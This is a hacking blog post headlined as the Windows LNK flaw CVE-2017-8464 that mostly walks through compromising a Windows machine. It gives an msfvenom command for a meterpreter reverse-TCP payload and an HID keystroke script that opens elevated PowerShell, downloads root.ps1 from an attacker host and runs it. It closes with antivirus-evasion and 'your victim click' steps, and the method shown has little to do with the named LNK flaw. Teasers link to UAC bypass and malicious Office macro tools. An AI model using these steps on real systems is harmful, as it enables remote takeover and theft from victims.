Microsoft Windows LNK CVE-2017-8464 Remote Code Execution Vulnerability

Published by root on

Bypass Antivirus & Exploit Windows Using PowerShell

Microsoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.

Affected Version

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

How to using CVE-2017-8464 to exploit Windows.

  1. Generate payload using metasploit 
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1337 -f psh-reflection > root.ps1
  2. Copy root.ps1 to /var/www/html

3. Create powershell script

REM Windows 10: Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
$down = New-Object System.Net.WebClient; $url = 'http://192.168.1.7/root.ps1'; $file = 'C:\tmp\root.ps1'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

Or you can create powershell shortcut to download and execute remote code using System.Net.WebClient.DownloadString(uri address) method

4. Put this powershell script to network sharing folder

5. Start msfconsole

 

6. The virus scanning result

7. Your victim click to run powershell script… You will get command shell

Loading

Categories: Tricks
Tags:

Related Posts

Tricks

How to bypass UAC in newer Windows Versions

What is UAC? UAC (User Account Control) is a security feature, introduced from Windows 7 and onward versions of Windows. This prevents that even a local administrator account can’t execute changes to operating system, unless Read more…

Tricks

Evil Clippy v1.1 Releases

Evil Clippy v1.1 releases: hide VBA macros, stomp VBA code and confuse macro analysis tools Evil Clippy A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and Read more…

Tools Tricks

XSS Chef: generating custom XSS payloads

What is XSS Chef? XSS Chef is a small React.js application inspired by CyberChef, which provides users with a modular way to build JavaScript payloads to typically be used during penetration tests to demonstrate cross-site scripting vulnerabilities. A Read more…